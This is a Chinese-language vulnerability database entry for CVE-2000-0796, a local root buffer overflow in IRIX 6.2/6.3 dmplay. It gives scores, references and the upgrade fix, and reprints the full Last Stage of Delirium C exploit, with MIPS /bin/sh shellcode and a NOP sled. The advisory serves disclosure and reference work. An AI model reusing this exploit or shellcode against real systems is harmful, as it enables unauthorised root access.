CVE-2000-0796
CVSS7.2
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:54
NMCOE    

[原文]Buffer overflow in dmplay in IRIX 6.2 and 6.3 allows local users to gain root privileges via a long command line option.


[CNNVD]IRIX dmplay权限提升漏洞(CNNVD-200010-041)

        IRIX 6.2和6.3版本的dmplay存在缓冲区溢出漏洞。本地用户可以借助超长命令行选项获取根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:sgi:irix:6.2SGI IRIX 6.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0796
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0796
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-041
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558@ix.put.poznan.pl
(VENDOR_ADVISORY)  BUGTRAQ  20000802 [LSD] some unpublished LSD exploit codes
http://www.securityfocus.com/bid/1528
(VENDOR_ADVISORY)  BID  1528
http://xforce.iss.net/static/5064.php
(UNKNOWN)  XF  irix-dmplay-bo(5064)
http://www.osvdb.org/1484
(UNKNOWN)  OSVDB  1484

- 漏洞信息

IRIX dmplay权限提升漏洞
高危 缓冲区溢出
2000-10-20 00:00:00 2005-05-02 00:00:00
本地  
        IRIX 6.2和6.3版本的dmplay存在缓冲区溢出漏洞。本地用户可以借助超长命令行选项获取根权限。

- 公告与补丁

        

- 漏洞信息 (20128)

IRIX 6.5.x dmplay Buffer Overflow Vulnerability (EDBID:20128)
irix local
2000-08-02 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/1528/info

Certain versions of IRIX ship with a version of dmplay which is vulnerable to a buffer overflow attack. The program, dmplay, is used to play movie files under IRIX. The problem at hand is the way the program handles the DISPLAY variable for the users X terminal. It does not check bounds and therefore is vulnerable to attack by an overly long user supplied string. 

                /*## copyright LAST STAGE OF DELIRIUM oct 1997 poland        *://lsd-pl.net/ #*/
                /*## /usr/sbin/dmplay                                                        #*/

                #define NOPNUM 800
                #define ADRNUM 156
                #define PCHNUM 148
                #define TMPNUM 52

                char shellcode[]=
                    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
                    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
                    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
                    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
                    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
                    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
                    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
                    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
                    "\x03\xff\xff\xcc"    /* syscall                      */
                    "/bin/sh"
                ;

                char jump[]=
                    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
                    "\x03\xe0\x00\x08"    /* jr      $ra                  */
                ;

                char nop[]="\x24\x0f\x12\x34";

                main(int argc,char **argv){
                    char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2],display[128];
                    int i;

                    printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland  //lsd-pl.net/\n");
                    printf("/usr/sbin/dmplay for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");

                    if(argc!=3){
                        printf("usage: %s {62|63} xserver:display\n",argv[0]);
                        exit(-1);
                    }

                    if(!strcmp(argv[1],"62")){
                        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10396+32;
                        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10396+32+900+30540;
                        *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10396+32+8000;
                    }
                    if(!strcmp(argv[1],"63")){
                        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10348+32;
                        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10348+32+900-84;
                        *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10348+32+8000;
                    }

                    sprintf(display,"DISPLAY=%s",argv[2]);
                    envp[0]=display;
                    envp[1]=0;

                    b=buffer;
                    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
                    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
                    *b++=0xff;
                    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
                    for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
                    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
                    *b=0;

                    execle("/usr/sbin/dmplay","lsd",buffer,0,envp);
                }
		

- 漏洞信息

1484
IRIX dmplay DISPLAY String Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

A local overflow exists in IRIX. The dmplay program fails to check bounds on strings passed to the DISPLAY variable via the command line, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code as root, resulting in a loss of integrity.

- 时间线

2000-08-02 Unknow
2000-08-02 Unknow

- 解决方案

Upgrade to version 6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站